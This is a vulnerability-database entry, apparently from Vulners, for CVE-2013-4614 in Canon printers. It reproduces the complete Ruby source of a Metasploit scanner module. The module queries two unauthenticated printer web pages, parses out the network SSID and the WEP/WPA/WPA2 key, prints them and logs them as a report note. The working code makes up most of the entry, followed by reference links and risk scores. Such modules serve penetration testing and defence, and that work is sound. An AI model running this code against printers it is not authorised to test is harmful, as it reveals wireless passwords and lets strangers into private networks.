Canon Printer Wireless Configuration Disclosure

🗓️ 27 May 2013 22:02:37Reported by Matt "hostess" Andreko <[email protected]>Type

Canon Printer Wireless Configuration Disclosure This module enumerates wireless credentials from Canon printers with a web interface. It has been tested on Canon models: MG3100, MG5300, MG6100, MP495, MX340, MX870, MX890, MX920. The module checks LAN settings and wireless key configuration.

Reporter	Title	Published	Views	Family All 11
Tenable Nessus	Canon PIXMA Printer WLAN Credential Disclosure	7 Apr 201400:00	–	nessus
Circl	CVE-2013-4614	29 May 201815:50	–	circl
CVE	CVE-2013-4614	21 Jun 201321:00	–	cve
Cvelist	CVE-2013-4614	21 Jun 201321:00	–	cvelist
EUVD	EUVD-2013-4470	7 Oct 202500:30	–	euvd
NVD	CVE-2013-4614	21 Jun 201321:55	–	nvd
OpenVAS	Canon Printer Multiple Vulnerabilities (Jun 2013) - Active Check	19 Jun 201300:00	–	openvas
Packet Storm	Canon Printer DoS / Secret Disclosure	18 Jun 201300:00	–	packetstorm
Packet Storm	Canon Printer Wireless Configuration Disclosure	1 Sep 202400:00	–	packetstorm
Prion	Design/Logic Flaw	21 Jun 201321:55	–	prion

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'nokogiri'

class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Canon Printer Wireless Configuration Disclosure',
      'Description'    => %q{
          This module enumerates wireless credentials from Canon printers with a web interface.
          It has been tested on Canon models: MG3100, MG5300, MG6100, MP495, MX340, MX870,
          MX890, MX920.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Matt "hostess" Andreko <mandreko[at]accuvant.com>'
        ],
      'References'     => [
        [ 'CVE', '2013-4614' ],
        [ 'OSVDB', '94417' ],
        [ 'URL', 'https://www.mattandreko.com/2013/06/canon-y-u-no-security.html']
      ],
      'DisclosureDate' => '2013-06-18'))
  end

  def get_network_settings
    begin
      res = send_request_cgi({
        'method' => 'GET',
        'uri'    => '/English/pages_MacUS/lan_set_content.html',
      })
    rescue
      print_error("#{rhost}:#{rport} Could not connect.")
      return
    end

    if res
      if res.code == 200

        html = Nokogiri::HTML(res.body)

        checked_lan_setting = html.xpath '//input[@name="LAN_OPT1" and @checked]'

        if checked_lan_setting.count == 1
          lan_setting = ''
          ssid = ''
          case checked_lan_setting[0]['value']
          when '0'
            lan_setting = 'Do not use LAN'
          when '1'
            lan_setting = 'Use wired LAN'
          when '2'
            lan_setting = 'Use wireless LAN'

            ssid_input = html.xpath '//input[@name="LAN_TXT1"]'
            ssid = ssid_input[0]['value'] if ssid_input.count == 1
          end

          return lan_setting, ssid
        else
          print_error("#{rhost}:#{rport} Could not determine LAN Settings.")
        end

      elsif res.code == 401
        print_error("#{rhost}:#{rport} Authentication failed")
      elsif res.code == 404
        print_error("#{rhost}:#{rport} File not found")
      end
    end
  end

  def get_wireless_key
    begin
      res = send_request_cgi({
        'method' => 'GET',
        'uri'    => "/English/pages_MacUS/wls_set_content.html",
      })
    rescue
      print_error("#{ip}:#{rport} Could not connect.")
      return
    end

    if res
      if res.code == 200
        html = Nokogiri::HTML(res.body)
        encryption_setting = ''
        encryption_key = ''

        checked_encryption_setting = html.xpath '//input[@name="WLS_OPT1" and @checked]'
        case checked_encryption_setting[0]['value']
        when '0'
          encryption_setting = 'None'
        when '1'
          encryption_setting = 'WEP'
          wep_key_inputs = html.xpath '//input[starts-with(@name, "WLS_TXT1") and not(@value="")]'
          encryption_key = wep_key_inputs.collect{|x| x['value']}.join(', ')
        when '2'
          encryption_setting = 'WPA'
          wpa_key_input = html.xpath '//input[@name="WLS_TXT2"]'
          encryption_key = wpa_key_input[0]['value']
        when '3'
          encryption_setting = 'WPA2'
          wpa2_key_input = html.xpath '//input[@name="WLS_TXT3"]'
          encryption_key = wpa2_key_input[0]['value']
        end

        return encryption_setting, encryption_key

      elsif res.code == 401
        print_error("#{rhost}:#{rport} Authentication failed")
      elsif res.code == 404
        print_error("#{rhost}:#{rport} File not found")
      end
    end
  end

  def run_host(ip)

    ns = get_network_settings
    return if ns.nil?

    good_string = "#{rhost}:#{rport} Option: #{ns[0]}"
    if ns[0] == 'Use wireless LAN'
      wireless_key = get_wireless_key
      good_string += "\tSSID: #{ns[1]}\tEncryption Type: #{wireless_key[0]}\tKey: #{wireless_key[1]}"
    end

    report_note({
      :data => good_string,
      :type => 'canon.wireless',
      :host => ip,
      :port => rport
    })

    print_good good_string

  end
end

16 Feb 2022 23:22Current

7High risk

Vulners AI Score7

CVSS 22.1

EPSS0.08011